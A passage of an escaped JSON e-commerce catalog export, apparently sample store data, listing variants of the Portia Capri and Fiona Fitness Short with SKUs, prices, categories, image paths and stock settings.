code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Portia Capri-29-Orange\",\"description\":\"<p>From yoga at dawn to evenings curled up with a book, our Portia Capri gives you the comfort and freedom to cruise through the day. The high-waisted design keeps you covered while you\'re bending and stretching, while contrast stripes promise a dash of sporty style.<\\/p>\\n<p>&bull; Salmon heather capri sweats.<br \\/>&bull; Relaxed fit, high waist. <br \\/>&bull; Inseam: 21\\\". <br \\/>&bull; Wide elastic waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"portia-capri-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp13-orange_back.jpg\",\"image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp13-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1856\":{\"sku\":\"WP13\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Portia Capri\",\"description\":\"<p>From yoga at dawn to evenings curled up with a book, our Portia Capri gives you the comfort and freedom to cruise through the day. The high-waisted design keeps you covered while you\'re bending and stretching, while contrast stripes promise a dash of sporty style.<\\/p>\\n<p>&bull; Salmon heather capri sweats.<br \\/>&bull; Relaxed fit, high waist. <br \\/>&bull; Inseam: 21\\\". <br \\/>&bull; Wide elastic waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Capri,material=Organic Cotton,pattern=Solid,climate=Indoor|Hot|Mild,eco_collection=Yes,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP13-28-Blue,size=28,color=Blue|sku=WP13-28-Green,size=28,color=Green|sku=WP13-28-Orange,size=28,color=Orange|sku=WP13-29-Blue,size=29,color=Blue|sku=WP13-29-Green,size=29,color=Green|sku=WP13-29-Orange,size=29,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp13-orange_back.jpg\",\"image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp13-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Capri\",\"material\":\"Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Hot|Mild\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"1857\":{\"sku\":\"WSH01-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-28-Black\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1858\":{\"sku\":\"WSH01-28-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-28-Green\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-28-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Green\"},\"1859\":{\"sku\":\"WSH01-28-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-28-Red\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-28-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Red\"},\"1860\":{\"sku\":\"WSH01-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-29-Black\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1861\":{\"sku\":\"WSH01-29-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-29-Green\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-29-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Green\"},\"1862\":{\"sku\":\"WSH01-29-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-29-Red\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-29-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Red\"},\"1863\":{\"sku\":\"WSH01-30-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-30-Black\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-30-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_s